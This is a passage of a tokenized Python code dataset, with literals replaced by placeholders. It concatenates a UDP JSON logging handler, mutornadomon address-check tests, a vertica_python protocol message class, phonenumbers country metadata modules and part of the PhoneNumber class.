Handler ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , host , port ) : <EOL> '''<STR_LIT>''' <EOL> logging . Handler . __init__ ( self ) <EOL> self . host = host <EOL> self . port = port <EOL> self . sock = None <EOL> self . raiseExceptions = <NUM_LIT:0> <EOL> self . hostname = socket . gethostname ( ) <EOL> if self . hostname . find ( '<STR_LIT:.>' ) != - <NUM_LIT:1> : <EOL> self . hostname = self . hostname . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> def connect ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . sock = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) <EOL> self . sock . connect ( ( self . host , self . port ) ) <EOL> def jsonify ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> timestamp = datetime . utcfromtimestamp ( record . created ) <EOL> timestamp = timestamp . isoformat ( ) <EOL> fields = { <EOL> '<STR_LIT>' : record . levelname , <EOL> '<STR_LIT:filename>' : record . pathname , <EOL> '<STR_LIT>' : record . lineno , <EOL> '<STR_LIT>' : record . funcName , <EOL> } <EOL> if record . exc_info : <EOL> fields [ '<STR_LIT>' ] = str ( record . exc_info ) <EOL> fields [ '<STR_LIT>' ] = format_exc ( record . exc_info ) <EOL> log = { <EOL> '<STR_LIT>' : self . hostname , <EOL> '<STR_LIT>' : timestamp , <EOL> '<STR_LIT>' : [ record . name ] , <EOL> '<STR_LIT>' : record . getMessage ( ) , <EOL> '<STR_LIT>' : fields , <EOL> } <EOL> return json . dumps ( log ) <EOL> def emit ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> if self . sock is None : <EOL> self . connect ( ) <EOL> jsonrecord = self . jsonify ( record ) <EOL> jsonrecord = '<STR_LIT>' % jsonrecord <EOL> self . sock . sendall ( jsonrecord ) <EOL> except Exception : <EOL> INTERNAL_LOG . exception ( '<STR_LIT>' ) <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> if self . sock : <EOL> self . sock . close ( ) <EOL> self . sock = None </s>
<s> from __future__ import absolute_import <EOL> import mock <EOL> import unittest <EOL> from mutornadomon . net import is_local_address <EOL> from mutornadomon . net import is_private_address <EOL> class TestIsLocalAddress ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_local_address_works_with_python2 ( self , is_python2_mock ) : <EOL> """<STR_LIT>""" <EOL> is_python2_mock . return_value = True <EOL> self . assertTrue ( is_local_address ( u'<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertTrue ( is_local_address ( '<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertFalse ( is_local_address ( '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_local_address_works_with_python3 ( self , is_python2_mock ) : <EOL> """<STR_LIT>""" <EOL> is_python2_mock . return_value = False <EOL> self . assertTrue ( is_local_address ( u'<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertTrue ( is_local_address ( '<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertFalse ( is_local_address ( '<STR_LIT>' ) ) <EOL> class TestIsPrivateAddress ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_private_address_works_with_python2 ( self , is_python2_mock ) : <EOL> """<STR_LIT>""" <EOL> is_python2_mock . return_value = True <EOL> self . assertTrue ( is_private_address ( u'<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertTrue ( is_private_address ( '<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertFalse ( is_private_address ( '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_private_address_works_with_python3 ( self , is_python2_mock ) : <EOL> """<STR_LIT>""" <EOL> is_python2_mock . return_value = False <EOL> self . assertTrue ( is_private_address ( u'<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertTrue ( is_private_address ( '<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertFalse ( is_private_address ( '<STR_LIT>' ) ) </s>
<s> from struct import pack <EOL> from vertica_python . vertica . messages . message import FrontendMessage <EOL> class CopyFail ( FrontendMessage ) : <EOL> def __init__ ( self , error_message ) : <EOL> self . error_message = error_message <EOL> def to_bytes ( self ) : <EOL> return self . message_string ( pack ( '<STR_LIT>' . format ( len ( self . error_message ) ) , self . error_message ) ) <EOL> CopyFail . _message_id ( b'<STR_LIT:f>' ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_882 = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = None , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = 
u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT:1>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_BJ = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> number_format = [ NumberFormat ( 
pattern = '<STR_LIT>' , format = u'<STR_LIT>' ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_CX = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> 
preferred_international_prefix = '<STR_LIT>' , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_GH = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> 
national_prefix_for_parsing = '<STR_LIT:0>' , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_JM = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT:1> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> national_prefix = 
'<STR_LIT:1>' , <EOL> national_prefix_for_parsing = '<STR_LIT:1>' , <EOL> leading_digits = '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_ME = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> 
national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' , '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' , '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_NO = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> no_international_dialling = 
PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) ] , <EOL> main_country_for_code = True , <EOL> leading_zero_possible = True ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_SD = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' , <EOL> number_format = [ NumberFormat ( 
pattern = '<STR_LIT>' , format = u'<STR_LIT>' , national_prefix_formatting_rule = u'<STR_LIT>' ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_TR = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , 
example_number = '<STR_LIT>' ) , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' , national_prefix_optional_when_formatting = True ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' , national_prefix_optional_when_formatting = True ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . util import UnicodeMixin , ImmutableMixin , mutating_method <EOL> class CountryCodeSource ( object ) : <EOL> """<STR_LIT>""" <EOL> FROM_NUMBER_WITH_PLUS_SIGN = <NUM_LIT:1> <EOL> FROM_NUMBER_WITH_IDD = <NUM_LIT:5> <EOL> FROM_NUMBER_WITHOUT_PLUS_SIGN = <NUM_LIT:10> <EOL> FROM_DEFAULT_COUNTRY = <NUM_LIT:20> <EOL> class PhoneNumber ( UnicodeMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> country_code = None , <EOL> national_number = None , <EOL> extension = None , <EOL> italian_leading_zero = False , <EOL> raw_input = None , <EOL> country_code_source = None , <EOL> preferred_domestic_carrier_code = None ) : <EOL> self . country_code = country_code <EOL> self . national_number = national_number <EOL> self . extension = extension <EOL> self . italian_leading_zero = italian_leading_zero <EOL> self . raw_input = raw_input <EOL> self . country_code_source = country_code_source <EOL> self . preferred_domestic_carrier_code = preferred_domestic_carrier_code <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> self . country_code = None <EOL> self . national_number = None <EOL> self . extension = None <EOL> self . italian_leading_zero = False <EOL> self . raw_input = None <EOL> self . country_code_source = None <EOL> self . preferred_domestic_carrier_code = None <EOL> def merge_from ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . country_code is not None : <EOL> self . country_code = other . country_code <EOL> if other . national_number is not None : <EOL> self . national_number = other . national_number <EOL> if other . extension is not None : <EOL> self . extension = other . extension <EOL> if other . italian_leading_zero is not None : <EOL> self . italian_leading_zero = other . italian_leading_zero <EOL> if other . raw_input is not None : <EOL> self . raw_input = other . raw_input <EOL> if other . country_code_source is not None : <EOL> self . country_code_source = other . country_code_source <EOL> if other . 
preferred_domestic_carrier_code is not None : <EOL> self . preferred_domestic_carrier_code = other . preferred_domestic_carrier_code <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , PhoneNumber ) : <EOL> return False <EOL> return ( self . country_code == other . country_code and <EOL> self . national_number == other . national_number and <EOL> self . extension == other . extension and <EOL> self . italian_leading_zero == other . italian_leading_zero and <EOL> self . raw_input == other . raw_input and <EOL> self . country_code_source == other . country_code_source and <EOL> self . preferred_domestic_carrier_code == other . preferred_domestic_carrier_code ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __repr__ ( self ) : <EOL> return ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % <EOL> ( self . country_code , <EOL> self . national_number , <EOL> self . extension , <EOL> self . italian_leading_zero , <EOL> self . country_code_source , <EOL> self . preferred_domestic_carrier_code ) ) <EOL> def __unicode__ ( self ) : <EOL> result = ( "<STR_LIT>" % <EOL> ( self . country_code , self . national_number ) ) <EOL> if self . italian_leading_zero is not None : <EOL> result += "<STR_LIT>" % self . italian_leading_zero <EOL> if self . extension is not None : <EOL> result += 